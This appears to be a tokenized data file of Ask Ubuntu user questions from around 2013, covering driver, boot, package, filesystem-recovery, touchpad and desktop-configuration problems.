/dev/mapper/isw_cgcfhffaff_xw133ce29743 '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 5450-4444 vfat dellutility /dev/sda2 60f237a5f2377dfa ntfs recovery /dev/sda3 d2043a90043a7795 ntfs os /dev/sda4 1d8c79d0-2d5c-4313-bc82-d42171717622 ext4 /dev/sr0 iso9660 ubuntu 12.04.2 lts amd64 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on isw_cgcfhffaff_xw133ce297431 unknown bootloader on isw_cgcfhffaff_xw133ce297432 unknown bootloader on isw_cgcfhffaff_xw133ce297433 unknown bootloader on isw_cgcfhffaff_xw133ce297434 ========= devices which do n't seem to have a corresponding hard drive : ========= sdc =============================== stderr messages : =============================== error : dos : partition address past end of raid device xz : ( stdin ) : compressed data is corrupt xz : ( stdin ) : compressed data is corrupt hexdump : /dev/mapper/isw_cgcfhffaff_xw133ce297431 : no such file or directory hexdump : /dev/mapper/isw_cgcfhffaff_xw133ce297431 : no such file or directory hexdump : /dev/mapper/isw_cgcfhffaff_xw133ce297432 : no such file or directory hexdump : /dev/mapper/isw_cgcfhffaff_xw133ce297432 : no such file or directory hexdump : /dev/mapper/isw_cgcfhffaff_xw133ce297433 : no such file or directory hexdump : /dev/mapper/isw_cgcfhffaff_xw133ce297433 : no such file or directory hexdump : /dev/mapper/isw_cgcfhffaff_xw133ce297434 : no such file or directory hexdump : /dev/mapper/isw_cgcfhffaff_xw133ce297434 : no such file or directory error : dos : partition address past end of raid device
322034	broadcom cooperation bcm4312 802.11b/g lp-phy driver	i need a broadcom cooperation bcm4312 802.11b/g lp-phy driver please note : i have no ethernet card , and my ubuntu laptop has no internet access .
322035	the basic apps installer extension	i have a question . that is : in windows the basic apps installer extensions are .exe and .msi so what is installer extensions in ubuntu ?
322039	different toolbar icons depending on active tab	i am attempting to write a small email client with local storage for ubuntu touch . i was wondering if there is a way for me to construct my toobar such that i only have to build one toolbar ( rather than a different toolbar for each tab ) and have it show different buttons depending on which tab is active , and how i would go about doing that ( if it is possible ) . this is because there are some toolbar buttons that will be static between the tabs ( ie//delete , send to archive , forward or such ) and some that will change based on the active tab ... and i would rather not write a different toolbar for each tab . ie// something sort of like this : if currenttab = 0 { show static items and tab-dependent items } else if currenttab = 1 { show static items and different tab-dependent items } ... and so on for each tab . thanks in advance !
322044	install a software using another distribution 's branch	suppose software like https : //launchpad.net/ubuntu/raring/+source/skipfish has more recent release in 13.04 , how do i add to apt-get in 12.04 to make use of that branch ? thanks
322046	how can i fix my uefi boot menu after installing ubuntu ?	after installing ubuntu , i used the tool boot-repair to get my laptop to load grub upon startup . unfortunately , after a while , i have noticed that i can no longer boot from a flash drive ( to reinstall windows or another linux distro ) because the boot menu is filled up with ubuntu entries . the uefi firmware is behaving oddly and i 'm scared that i will end up with a brick unable to boot any os . boot-repair info all options including `` os boot manager '' take me to grub . the list does not scroll . from looking at the windows 8 advanced reboot menus i know there are more options hidden down there . my settings indicate that secure boot is disabled . however , when i boot the flash drive from windows 8 's advanced reboot menu i get a message indicating that my computer will not boot from it ( if you need the exact text i can try that again ) . i imagine fixing this involves removing those extra entries from some efi boot partition or something . thanks in advance for your help . my laptop is a hp envy spectre xt .
322056	use postfix to dump mails to local folder using regex	how do i use postfix to filter certain emails ( by domain or sender ) and for those who fall under the rule ( filter ) save locally and those who does n't to relay regularly ?
322064	what is the difference between fglrx* and fglrx ?	is there a difference between fglrx* and fglrx ? what is the meaning of * if added ? ? i did use the following steps because i was not sure whether i 've had a graphic driver or not . so i wanted to activate a driver ... ati/amd proprietary fglrx graphics install fails , how can i resolve the problem ? then many problems occured - like changes of the quality of the desktop environment - and i wanted to know if they happened because of the difference of * ? i am a new ubuntu 12.04 user . was it wrong to have purged fglrx* ? i also get this error each time i boot ubuntu since then : the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present i would be really glad if someone could help me out !
322065	renamed file reappeared	i renamed cap_i.tex to cap_iv.tex when i was offline . when i went online ubuntu one downloaded cap_i.tex so i had both cap_i.tex and cap_iv.tex i then manually deleted cap_i.tex from the desktop ( then ubuntu one duly removed it from the cloud ) . is there a way to avoid this hassle from repeating in the future ? thank your for your attention .
322066	unable to start postgresql : operation not permitted	i have a question about starting and using postgresql once it has been installed . here is the command that i have used and the error message : dbacc @ dbacc-compaq-615 : ~ $ /etc/init.d/postgresql start chmod : changing permissions of `/var/run/postgresql ' : operation not permitted the installation seemed to go well . i must be missing something ( ubuntu rookie ) . thank you for any suggestions you can give me .
322069	gedit : saving has been disable by system administrator	i have a problem with gedit . if i start writing a new file or edit an existing file the save button and short cut to save is disabled . if i exit a modified document a dialog opens with the following text : changes to the document `` < name > '' will be permanently lost . saving has been disabled by the system administrator . the interesting part about this is that i can save the file from right clicking the document in the side panel . i have tried removing gedit-related gconf from the terminal while logged out ( rm -rf .gconf/apps/gedit-2/ ) , but it does n't work .
322070	how can i fix mounting my data drive after a crash ?	after a crash , i ca n't mount my data drive . the os was on a different drive . how can i recover/restore access to my data drive ? i think the drive is physically intact . i was using ubuntu 12.04 . booted xubuntu 13.04 from usb . i get this error message : error mounting /dev/sda1 at /media/xubuntu/e16422c3-7c60-4b9e-a135-ec96a6f7c4c6 : command-line `mount -t `` ext4 '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sda1 '' `` /media/xubuntu/e16422c3-7c60-4b9e-a135-ec96a6f7c4c6 '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sda1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail matty thanks for your suggestions . that did n't work . possibly because i got side tracked at one point . fdisk -l shows : disk /dev/sda : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xbd45990e device boot start end blocks id system /dev/sda1 1 4294967295 2147483647+ ee gpt fsck.ext4 showed : xubuntu @ xubuntu : ~ $ sudo fsck.ext4 -v /dev/sda1 e2fsck 1.42.5 ( 29-jul-2012 ) ext2fs_check_desc : corrupt group descriptor : bad block for block bitmap fsck.ext4 : group descriptors look bad ... trying backup blocks ... fsck.ext4 : bad magic number in super-block while using the backup blocksfsck.ext4 : going back to original superblock superblock has an invalid journal ( inode 8 ) . clear < y > ? yes here is where i got side tracked , i pressed 'y ' . and got : ext3 journal has been deleted - filesystem is now ext2 only one or more block group descriptor checksums are invalid . fix < y > ? yes group descriptor 832 checksum is 0x0000 , should be 0xd27b . fixed . group descriptor 833 checksum is 0x0000 , should be 0x3f7a . fixed . group descriptor 834 checksum is 0x0000 , should be 0x487a . fixed . group descriptor 835 checksum is 0x0000 , should be 0xa57b . fixed . group descriptor 836 checksum is 0x0000 , should be 0xa67a . fixed . group descriptor 837 checksum is 0x0000 , should be 0x4b7b . fixed . group descriptor 838 checksum is 0x0000 , should be 0x3c7b . fixed . group descriptor 839 checksum is 0x0000 , should be 0xd17a . fixed . group descriptor 840 checksum is 0x0000 , should be 0x3a79 . fixed . group descriptor 841 checksum is 0x0000 , should be 0xd778 . fixed . group descriptor 842 checksum is 0x0000 , should be 0xa078 . fixed . group descriptor 843 checksum is 0x0000 , should be 0x4d79 . fixed . group descriptor 844 checksum is 0x0000 , should be 0x4e78 . fixed . group descriptor 845 checksum is 0x0000 , should be 0xa379 . fixed . group descriptor 846 checksum is 0x0000 , should be 0xd479 . fixed . group descriptor 847 checksum is 0x0000 , should be 0x3978 . fixed . group descriptor 848 checksum is 0x0000 , should be 0x427c . fixed . group descriptor 849 checksum is 0x0000 , should be 0xaf7d . fixed . group descriptor 850 checksum is 0x0000 , should be 0xd87d . fixed . group descriptor 851 checksum is 0x0000 , should be 0x357c . fixed . group descriptor 852 checksum is 0x0000 , should be 0x367d . fixed . group descriptor 853 checksum is 0x0000 , should be 0xdb7c . fixed . group descriptor 854 checksum is 0x0000 , should be 0xac7c . fixed . group descriptor 855 checksum is 0x0000 , should be 0x417d . fixed . group descriptor 856 checksum is 0x0000 , should be 0xaa7e . fixed . group descriptor 857 checksum is 0x0000 , should be 0x477f . fixed . group descriptor 858 checksum is 0x0000 , should be 0x307f . fixed . group descriptor 859 checksum is 0x0000 , should be 0xdd7e . fixed . group descriptor 860 checksum is 0x0000 , should be 0xde7f . fixed . group descriptor 861 checksum is 0x0000 , should be 0x337e . fixed . group descriptor 862 checksum is 0x0000 , should be 0x447e . fixed . group descriptor 863 checksum is 0x0000 , should be 0xa97f . fixed . note : if several inode or block bitmap blocks or part of the inode table require relocation , you may wish to try running e2fsck with the '-b 32768 ' option first . the problem may lie only with the primary block group descriptors , and the backup block group descriptors may be ok. inode bitmap for group 864 is not in group . ( block 732566272 ) relocate < y > ? yes group descriptor 864 checksum is 0x0000 , should be 0x32fb . fixed . group descriptor 865 checksum is 0x0000 , should be 0xf1b1 . fixed . block bitmap for group 866 is not in group . ( block 1353979985 ) relocate < y > ? yes group descriptor 866 checksum is 0x0000 , should be 0x3179 . fixed . group descriptor 867 checksum is 0x6f4d , should be 0x9550 . fixed . block bitmap for group 868 is not in group . ( block 1936025974 ) relocate < y > ? yes group descriptor 868 checksum is 0x0000 , should be 0xc677 . fixed . group descriptor 869 checksum is 0x0000 , should be 0x2b76 . fixed . group descriptor 870 checksum is 0x0000 , should be 0xf1c8 . fixed . group descriptor 871 checksum is 0x0000 , should be 0xbc94 . fixed . inode table for group 872 is not in group . ( block 1352676045 ) warning : severe data loss possible . relocate < y > ? cancelled ! group descriptor 872 checksum is 0x0000 , should be 0x3bf2 . fixed . /dev/sda1 : ***** file system was modified ***** /dev/sda1 : ********** warning : filesystem still has errors ********** mke2fs produced this : xubuntu @ xubuntu : ~ $ sudo mke2fs -n /dev/sda1 mke2fs 1.42.5 ( 29-jul-2012 ) filesystem label= os type : linux block size=4096 ( log=2 ) fragment size=4096 ( log=2 ) stride=0 blocks , stripe width=0 blocks 183017472 inodes , 732044433 blocks 36602221 blocks ( 5.00 % ) reserved for the super user first data block=0 maximum filesystem blocks=4294967296 22341 block groups 32768 blocks per group , 32768 fragments per group 8192 inodes per group superblock backups stored on blocks : 32768 , 98304 , 163840 , 229376 , 294912 , 819200 , 884736 , 1605632 , 2654208 , 4096000 , 7962624 , 11239424 , 20480000 , 23887872 , 71663616 , 78675968 , 102400000 , 214990848 , 512000000 , 550731776 , 644972544 then i tried each of the block numbers ... root @ xubuntu : /home/xubuntu # e2fsck -b 8193 /dev/sda1 root @ xubuntu : /home/xubuntu # e2fsck -b 98304 /dev/sda1 root @ xubuntu : /home/xubuntu # e2fsck -b 8193 /dev/sda -- suggested in err msg root @ xubuntu : /home/xubuntu # e2fsck -b 163840 /dev/sda1 root @ xubuntu : /home/xubuntu # e2fsck -b 229376 /dev/sda1 ... ... each with the same result : e2fsck 1.42.5 ( 29-jul-2012 ) e2fsck : bad magic number in super-block while trying to open /dev/sda1 the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device > upon reflection at this point i may have made a serious mistake . i ran `` fsck.ext4 -v /dev/sda1 '' again an answered the prompts with `` y '' 20 or 30 times hoping fsck.ext4 would fix things . should i give up , or are there other things to try ?
322071	how can firefox freeze my session	i 'm on 13.04 , stock firefox . mouse freezes , ctrl+alt+terminal does not work . it locks for about 5-10 seconds at a time , while loading a seemingly innocuous webpage . it gets back to normal after the lockout . i use ghostery and adblock .
322077	do i set triplebuffer `` 1 '' or `` true '' in xorg.conf ?	i am trying to figure out how to enable triple buffering . google says i need to add a line to my xorg.conf file , but every site i 've gone to said to use `` 1 '' or `` true '' . does it matter which one i use ?
322079	error in disk partitioning during ubuntu server 12.04 install	i 'm installing ubuntu server on an old 2003 dell computer that has a 2 ghz intel processor , 128 mb ram and 40 gb hdd . i 'm installing from a multiboot usb . everything goes fine ; however when i get to partitioning the hard drive , i get this ( i 'd post the image , but ask ubuntu does n't let me yet ) : [ ! ! ] partition disks ? ? ? ? ? ? < go back > < continue > whether i click continue or go back , the screen becomes purple with a white line below and does nothing . p.s . : the computer has windows xp installed and it run without any problem .
322084	package system is broken	this is what update manager pops up with : the following packages have unmet dependencies : libc6 : depends : libc-bin ( = 2.15-0ubuntu10.4 ) but 2.15-0ubuntu10.4 is installed depends : libgcc1 but it is not installed depends : tzdata but it is not installed edit : sudo apt-get -f install returns : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : apt-utils coreutils debconf debconf-i18n dpkg libacl1 libapt-inst1.4 libapt-pkg4.12 libattr1 libbz2-1.0 libdb5.1 libgcc1 liblocale-gettext-perl liblzma5 libselinux1 libstdc++6 libtext-charwidth-perl libtext-iconv-perl libtext-wrapi18n-perl perl-base tar tzdata xz-utils zlib1g suggested packages : debconf-doc debconf-utils whiptail dialog gnome-utils libterm-readline-gnu-perl libgtk2-perl libnet-ldap-perl libqtgui4-perl libqtcore4-perl apt bzip2 ncompress xz-lzma the following new packages will be installed : apt-utils coreutils debconf debconf-i18n dpkg libacl1 libapt-inst1.4 libapt-pkg4.12 libattr1 libbz2-1.0 libdb5.1 libgcc1 liblocale-gettext-perl liblzma5 libselinux1 libstdc++6 libtext-charwidth-perl libtext-iconv-perl libtext-wrapi18n-perl perl-base tar tzdata xz-utils zlib1g 0 upgraded , 24 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/9,304 kb of archives . after this operation , 29.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y e : can not get debconf version . is debconf installed ? debconf : apt-extracttemplates failed : no such file or directory dpkg : regarding ... /libgcc1_1 % 3a4.6.3-1ubuntu5_i386.deb containing libgcc1 , pre- dependency problem : libgcc1 pre-depends on multiarch-support multiarch-support is unpacked , but has never been configured . dpkg : error processing /var/cache/apt/archives/libgcc1_1 % 3a4.6.3-1ubuntu5_i386.deb ( - -unpack ) : pre-dependency problem - not installing libgcc1 errors were encountered while processing : /var/cache/apt/archives/libgcc1_1 % 3a4.6.3-1ubuntu5_i386.deb e : internal error , no file name for libc6 w : could not perform immediate configuration on 'multiarch-support : i386 ' . please see man 5 apt.conf under apt : :immediate-configure for details . ( 2 ) e : sub-process /usr/bin/dpkg returned an error code ( 1 ) sudo dpkg -- configure -a returns dpkg : dependency problems prevent configuration of libc6 : libc6 depends on libgcc1 ; however : package libgcc1 is not installed . libc6 depends on tzdata ; however : package tzdata is not installed . dpkg : error processing libc6 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of multiarch-support : multiarch-support depends on libc6 ( > = 2.13-0ubuntu6 ) ; however : package libc6 is not configured yet . dpkg : error processing multiarch-support ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libc6
322092	in ubuntu 13.04 , can i add more wallpapers to the collections ubuntu already has ?	i 'm using ubuntu 13.04 , and i noticed there are several excellent wallpapers , but i 'd wish to add my own in a sort of collection similar to those it has that have an auto-changing cappability . i tried using wallch and desktopnova , both look cool , but neither works , dunno why ... but i suppose it should n't be so hard to make my own images rotable , or is it ? so ... can i save my images in some special folder to see them there ? is it possible to add a folder instead of just one image at the time , so they rotate ?
322094	configure / add a fqdn to /etc/hosts ?	i 'm trying to set up iredmail 0.8.5 and i keep getting this error . root @ danielbts11 : ~ # cd /home/iredmail-0.8.5 root @ danielbts11 : /home/iredmail-0.8.5 # bash iredmail.sh hostname : name or service not known hostname : name or service not known < error > please configure a fully qualified domain name ( fqdn ) in /etc/hosts before we go further . example : 127.0.0.1 mail.iredmail.org mail localhost i have no clue on what to put in that file it 's asking me to edit . my domain is dbatease.com and my ip is 74.91.123.215 running ubuntu 13.04 .
322103	help wanted with customising the markdown panel in gedit	i have gedit 3.6.2 ( lubuntu 13.04 ) and i 've installed a plugin from gedit-markdown : support for markdown language in gedit that allows me to preview markdown text in a bottom or side panel within gedit . i want to know if it 's possible to change the background color of the lower panel from white to something else like # 999 . i 'm using greybird ( from `` shimmer-themes '' in the software center ) in which i 've already modified gtk.css to have the following colors : /* default color scheme */ @ define-color bg_color # 9e9e9e ; @ define-color fg_color # 000043 ; @ define-color base_color # 8e8e8e ; @ define-color text_color # 000 ; @ define-color selected_bg_color # 091825 ; @ define-color selected_fg_color # a2e5fb ; @ define-color tooltip_bg_color # 333333 ; @ define-color tooltip_fg_color # aaaaaa ; despite these changes to gtk.css ( which are effective for other gtk3 apps ) , the background color in the bottom panel stays white : for the upper ( main ) panel , i use a slightly modified cobalt color scheme ( /usr/share/gtksourceview-3.0/styles/cobalt.xml ) .
322105	ca n't run any xbuntu , stuck at boot	when booting ubuntu/lubuntu and others it 's stuck at one point shown in the screenshots linked to below . i tried installing from windows , but when choosing ubuntu after start it shows some text trying different filesystems and short error , but it disappears fast so i ca n't read it . hardware • motherboard : gigabyte ga-870a ud3 bios : the newest fef • cpu : amd fx-6200 six-core • 8gb ram • 1st ssd : plextor 128gb ( windows 7 ) • 2nd ssd : intel 830 ( trying to put linux here , currently here is grub , 1st boot hdd ) • 2x hdd links for screens of the problem 3 test on lubuntu , ubuntu 12.04 and ubuntu 13.04 amd64 :
322111	ubuntu 13.04 is really slow on the window7	i have recently installed ubuntu 13.04 on my laptop . specs : windows 7 core i5 4gb ram 500gb hard disk . ever since i have installed ubuntu , it has been responding really slow . i installed it using the virtual box and did n't dual boot . will defragmentation help ?
322116	problems recognizing wireless card with inspiron 1420	my computer is a dell inspiron 1420 and i have installed 12.04 on it . after which ubuntu did not recognized my wireless card . i tried installing the proprietary drivers using the gui tool provided but it always gave an error when trying to download the packages . -- original -- mi computadora es una dell inspiron 1420 , he instalado el ubuntu 12,04 esta no reconoci贸 mi tarjeta inalambrica intente activarla y activar los controladores del propietario de manera grafica pero al intentar activar los controladores estos no se logra descargar el paquete .
322118	wireless driver stops working after reboot	decided to give ubuntu a try after a couple of years away from linux . the additional drivers utility failed and so i ended up doing research online to find a fix . i installed ubuntu 12.04 on a vista laptop ( dual boot ) that has a broadcom 4312 wifi chip set and so it needed the b43 driver to work . i followed the walk thru here and everything seemed to be going fine . then when i rebooted it stopped working again so i had to open a terminal and do a sudo modprobe b43 to get it up and running again . i followed the additional steps about the blacklisting in the switching drivers section and tried to purge the bcmawl-kernal but my system does n't have it so i got the message it could n't find it . what else is there for me to do in order to ensure the b43 gets loaded at boot ?
322120	how do you install a package in the official backports repository using synaptic ?	i would like to install the current version of hedgewars into ubuntu using synaptic , but i 'm not sure the exact steps . i need to get my buddies playing .
322122	switching from server to desktop	i have ubuntu server 12.10 and i would like to switch to desktop and would like to know how ? thanks
322125	easybcd ca n't find ubuntu ?	i tried to install win7 + ubuntu 12.04 on my dell inspiron 17r , win7 first ubuntu second using u disk . at first i installed win7 and ubuntu under ata and ahci mode and successfully created entry for ubuntu using easybcd , but neither of these two modes can use intel rapid storage tech ( i suffered blue screen when i installed the drive ) . thus i switched to intel smart response tech mode and re-installed the two systems . however , when i tried to add new entry for ubuntu ( add new entry - > linux/bsd - > device ) , the easybcd ca n't find the partition of ubuntu ( it can find ubuntu under ata and achi mode ) . how to solve this problem ?
322127	how to update 12.04lts to 13.04 ?	i want to upgrade my os from 12.04lts to 13.04 , but the update manager only shows me 12.10 as an upgrade option available . what do i do now ? ? please suggest me a safe and legal way .
322129	dbus error org.freedesktop.dbus.error.invalidargs : mountpoint already registered	when i inserted my cd disc , it did not play but the following message is displayed : dbus error org.freedesktop.dbus.error.invalidargs : mountpoint already registered how may i proceed ?
322131	uunable to install software or update the system after half installed java	please help solve 'oracle-java7-installer ' missing . error below dpkg : warning : files list file for package ! [ 'oracle-java7-installer ' missing ; ] [ 1 ] assuming package has no files currently installed ( reading database ... 302933 files and directories currently installed . ) removing linux-image-extra-3.8.0-19-generic ... /var/lib/dpkg/info/linux-image-extra-3.8.0-19-generic.postrm : 6 : /var/lib/dpkg/info/linux-image-extra-3.8.0-19-generic.postrm : syntax error : `` ) '' unexpected dpkg : error processing linux-image-extra-3.8.0-19-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 2 errors were encountered while processing : linux-image-extra-3.8.0-19-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover :
322132	empty log files after using logkeys	why do i have empty log files after i start the keylogging process ? i am using ubuntu 13.04 and here are the steps i took : touch test.log sudo logkeys -s -o test.log i would test it out by typing random words on the google bar and searching other stuff . i would also open up another terminal and type : tail -- follow test.log where i would also type in random words . after this , i stopped logkeys by this code : sudo logkeys -k then i would look at my log file to see if it worked and saw that it was blank ! is there any way that i can fix this so i can be able to view my logs ?
322135	please help solve 'oracle-java7-installer ' missing ; dpkg : error processing linux-image-extra-3.8.0-19-generic	system info linux -system-product-name 3.8.0-23-generic # 34-ubuntu smp i686 athlon i686 gnu/linux
322136	chromium page search bar ?	i was reading a webpage and hit some unknown buttons on my keyboard and a search bar popped up in the top right hand corner of the browser under the tool bar and any thing you type in the bar is highlighted on the page your on . how do i get this bar to appear ? i am on ubuntu 12.04 and my chromium version is the latest in the repositories .
322138	ugly fonts in netbeans	is there a way to fix the ugly fonts in netbeans that really works on ubuntu 13.04 and netbeans 7.3.1 ? i tried everything i could find on this topic but nothing worked for me . please do n't tell me to do any of these , as i 've tried them all : http : //askubuntu.com/a/65194/31521 ( fonts are bigger but still ugly ) http : //askubuntu.com/a/60920/31521 ( does n't change anything , same with _java_options ) https : //netbeans.org/bugzilla/show_bug.cgi ? id=215785 # c7 ( fixed in netbeans 7.2.1 ) switch to oracle jvm ( absolutely no changes ) also i 'm not interested in just changing the editor font as that does n't really solve the problem .
322145	force format an external hdd	my seagate 500 gb external hdd stopped working few days ago for unknown reasons . i do n't really care about the data on it anymore . i just want it to work properly again but i cant format it in gparted or disk utility . in fact , i ca n't even see my drive in both places . i get this error when i connect it via usb : error mounting /dev/sdb1 at /media/sourabh/backup : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/sourabh/backup '' ' exited with non-zero exit status 13 : the disk contains an unclean file system ( 0 , 0 ) . the file system was n't safely closed on windows . fixing . ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . failed to sync device /dev/sdb1 : input/output error failed to close volume /dev/sdb1 : input/output error how can i force format this drive ?
322153	upgrade and new software installation fails	errors were encountered while processing : linux-image-extra-3.8.0-19-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the output of uname -a is : linux balu-system-product-name 3.8.0-23-generic # 34-ubuntu smp wed may 29 20:24:54 utc 2013 i686 athlon i686 gnu/linux
322154	touchpad faster in y than x	i have an aspire s7 with ubuntu 13.04 and most things work fine , but the touchpad is killing me . the touchpad is ( from 'xinput list ' ) â âł etps/2 elantech touchpad id=13 [ slave pointer ( 2 ) ] the main problem i am having is that the tad is substantially more sensitive in the y direction than it is in the x . is there a way to correct this ? right now if i move my finger in a circle on the pad the cursor moves in an 0 shape . there 's also a lack of sensitivity that makes it hard to select small objects . i 'm not sure if this can be helped or if it 's a driver issue . i 've tried a few programs to tweak settings but i have n't been able to make it any better . any help is great !
322158	indicator-stickynotes 404 error	i am using ubuntu 12.04 i tried to install indicator-sticky notes using the ppa as mentioned sudo add-apt-repository ppa : umang/indicator-stickynotes sudo apt-get update sudo apt-get install indicator-stickynotes but it does n't installs instead it gives a 404 error for the ppa . is the link not valid now ?
322161	two finger scroll issues : erratic selecting and app switching -macbook pro 8,1	i 've got ubuntu 13.04 on a macbook pro 8,1 i 'm having issues with two fingered scrolling , 1 : i ca n't select multiple items from a long list , because when i touch my fingers on the pad to scroll through the list , it selects as if i was doing a 1 one fingered tap . 2 : having two fingers on the pad sometimes opens the switcher and causes rapid cycling through the apps . here are my touch pad settings from synclient -l parameter settings : leftedge = -3611 rightedge = 4246 topedge = 517 bottomedge = 6108 fingerlow = 25 fingerhigh = 30 fingerpress = 257 maxtaptime = 180 maxtapmove = 511 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 0 emulatetwofingerminz = 283 emulatetwofingerminw = 7 vertscrolldelta = -232 horizscrolldelta = -232 vertedgescroll = 0 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 1 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0172176 trackstickspeed = 40 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 929 edgemotionusealways = 0 touchpadoff = 0 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 3 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 37 verthysteresis = 26 clickpad = 1 rightbuttonarealeft = 0 rightbuttonarearight = 0 rightbuttonareatop = 0 rightbuttonareabottom = 0 middlebuttonarealeft = 0 middlebuttonarearight = 0 middlebuttonareatop = 0 middlebuttonareabottom = 0 and from dconf org.gnome.settings-daemon.peripherals.touchpad disable-while-typing 1 horiz-scroll-enabled 1 left-handed mouse motion-acceleration 3 motion-threshold 8 natural-scroll 1 scroll-method two-finger-scrolling tap-to-click 1 touchpad-enabled 1 any suggestions ? thanks mat
322163	how can i uninstall ubuntu without dual booting	it 's an old computer so i decided i 'd mess around with ubuntu and try it out , but now i have a use for it and would prefer it be windows . however , since updating last week ubuntu has overwritten my ability to boot from a cd and i ca n't figure out a way to get rid of it .
322165	restoring the default kde desktop ?	sorry , i am still a newbie on linux , i was installing earlier some new des , i made fresh installation of ubuntu 13.04 , installed , then added kubunutu-desktop , lubuntu-desktop and gnome ... then when i wanted to test my new kde things were kinda , weird instead of the normal kde 4.10.5 desktop i mean the place with the wallpaper , short-cuts and widgets are , i got this weird looking thing , that is like a blue outdated ugly version of the old gnome 3 dash ... . i want back my default desktop ... . any ideas ? dx screenshots attached below : what i got : what i want ( back ) :
322170	flash can not be displayed normally on ubuntu 13.04	i have upgraded to ubuntu 13.04 and installed adobe flash . every time flash is opened in chromium , it shows like this : what is the problem ? how can i fix it ?
322173	forgot password and ca n't access grub menu	i forgot my username and password so i ca n't log on . i have seen how to load a recovery boot from the grub menu , but i ca n't access mine . it says press esc , but i 've tried at least 50 million times and it just counts down from 2 and continues loading . i 've tried holding it and pressing it repeatedly . i tried pressing shift ( even though i have an older version where you press esc ) and that did n't work either . i tried every other butt so many different times and ways with no success . i 've also tried guessing my username and password ( since i ca n't remember either ) but to no avail . i also created a windows 7 boot disc to try and change os and just wipe my computer , but it does n't work . it just takes forever to read the disc and then ignores it and continues loading ubuntu ... i have no idea what to do and i do n't want to have to buy a new tower . my big brother made me this computer but i have a laptop and did n't have space for both in my tiny dorm room . now i have my own apartment and i need to use this . is there some way to wipe it externally ? there are no important or relative files since it 's so old and i just want to use my computer again ... is there anything i could do ?
322177	ubuntu one file sync error	today i am going to share my file to ubuntu one , but having problem with sync , file sync error , click after restart button , it 's showing same result
322183	ca n't download anything	when i try to install usb-modeswitch for making a mobile-broadband work , ubuntu can not download anything . even when i tried to install wine , it failed to connect to the internet even though i could surf websites . links for the image : ps- this belonged to my sister and worked on a proxy server in iit delhi before giving it to me . i went to network proxy- > direct internet connection so that i could use the wifi in my home . also , as you can see in the photos that the wifi is connected and i can use it to surf the net but it can not download anything . the ubuntu is also unable to detect my huawei usb modem
322184	ubuntu on external hdd . help !	update : i did how ubuntu_tr told me to do . ubuntu installs successfully . but when i boot with the hdd , this error shows up : error : partition is undiscoverable grub rescue > _ [ i could type some command here ] any idea ? orignal : ok , all i want is a bootable installation on my external hdd . i want ubuntu to boot on any computer i plug into . is it possible ? can someone point me to detailed instructions of doing so ?
322187	why `apropos url` output 'url ( 7 ) ' but i ca n't use the command url	i want a url encoder . so i aproposed it in the terminal and received following $ apropos url uri ( 7 ) - uniform resource identifier ( uri ) , including a url or urn uri : :url ( 3pm ) - uniform resource locators url ( 7 ) - uniform resource identifier ( uri ) , including a url or urn urn ( 7 ) - uniform resource identifier ( uri ) , including a url or urn but when i type url it outputs : $ url no command 'url ' found , did you mean : command 'rl ' from package 'randomize-lines ' ( universe ) command 'ul ' from package 'bsdmainutils ' ( main ) command 'erl ' from package 'erlang-base ' ( main ) command 'erl ' from package 'erlang-base-hipe ' ( universe ) command 'uil ' from package 'libmotif-dev ' ( multiverse ) command 'uil ' from package 'lesstif-bin ' ( universe ) command 'curl ' from package 'curl ' ( main ) url : command not found
